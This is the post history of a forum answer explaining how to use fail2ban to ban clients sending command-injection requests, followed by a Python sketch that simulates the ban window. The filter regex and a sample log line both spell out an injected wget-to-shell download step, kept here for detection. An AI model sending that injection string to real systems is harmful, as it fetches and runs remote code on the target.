Post History
Answer
#2: Post edited
If these requests are logged into a log file you can install `fail2ban` and configure it to act on these log entries. You can configure it to block the requests via the local firewall for a duration of your choosing.
- If these requests are logged into a log file you can install [`fail2ban`](https://github.com/fail2ban/fail2ban) and configure it to act on these log entries. You can configure it to block the requests via the local firewall for a duration of your choosing.
- This would be a very basic (and untested) example:
- You create a service definition `/etc/fail2ban/filter.d/myservice.conf`:
- ```ini
- [Definition]
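- # <HOST> marks the address fail2ban will ban; this assumes each log line starts with the client address
- failregex = ^<HOST> .*\$\(id>`wget\+http:\/\/\[.+\]\/t\+-O-\+\|\+sh`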
- ```
- You can test it with the command `fail2ban-regex`:
- ```
- fail2ban-regex /var/log/myservice.log /etc/fail2ban/filter.d/myservice.conf
- ```
- Then you create a jail that uses this service in `/etc/fail2ban/jail.d/myservice.conf`:
- ```ini
- # service name
- [myservice]
- # turn on/off
- enabled = true
- # ports to ban (numeric or text)
- port = http,https
- # filter from previous step
- filter = myservice
- # file to parse
- logpath = /var/log/myservice.log
- # ban rule:
- # 5 times in 1 minute
- maxretry = 5
- findtime = 60
- # ban for 10 minutes
- bantime = 600
- ```
- This assumes that your service is accessed via the regular HTTP/HTTPS ports; those are the ones that get blocked.
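
The following is an added sketch, not part of the answer and not fail2ban's own code, of how the filter and jail settings above interact: a line only counts if the pattern yields a client address, and a host is banned once it reaches `maxretry` matches within `findtime` seconds. The log format (`<epoch> <client> <request>`), the simplified stand-in for `<HOST>`, the function names and the sample lines are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque

# The answer's pattern with a host group in front. fail2ban expands <HOST>
# itself; the \S+ stand-in below is a simplification for this sketch.
FAILREGEX = r"^<HOST> .*\$\(id>`wget\+http:\/\/\[.+\]\/t\+-O-\+\|\+sh`"
PATTERN = re.compile(FAILREGEX.replace("<HOST>", r"(?P<host>\S+)"))

MAXRETRY, FINDTIME = 5, 60  # maxretry and findtime from the jail above


def parse(line):
    """Return (epoch_seconds, host) for a matching line, else None."""
    ts, _, rest = line.partition(" ")
    m = PATTERN.search(rest)
    return (int(ts), m.group("host")) if m else None


def hosts_to_ban(lines):
    """Hosts that reach MAXRETRY matches inside a sliding FINDTIME window."""
    recent, banned = defaultdict(deque), []
    for line in lines:
        hit = parse(line)
        if hit is None:
            continue  # benign or unparsable line: never counted
        ts, host = hit
        window = recent[host]
        window.append(ts)
        while window and ts - window[0] > FINDTIME:
            window.popleft()  # forget matches older than findtime
        if len(window) >= MAXRETRY and host not in banned:
            banned.append(host)
    return banned


# Constructed log lines; all addresses come from documentation ranges.
BAD = "GET /$(id>`wget+http://[2001:db8::1]/t+-O-+|+sh`) HTTP/1.1"
SAMPLE_LOG = (
    [f"{1000 + 10 * i} 203.0.113.7 {BAD}" for i in range(5)]     # 5 hits in 40 s
    + [f"{1000 + 40 * i} 198.51.100.9 {BAD}" for i in range(5)]  # 5 hits in 160 s
    + ["1005 192.0.2.4 GET /index.html HTTP/1.1"]                # benign request
)

if __name__ == "__main__":
    print(hosts_to_ban(SAMPLE_LOG))
```

The slow sender at 198.51.100.9 is not banned because its matches never reach five inside one 60-second window; widening `findtime` or lowering `maxretry` in the jail changes that trade-off.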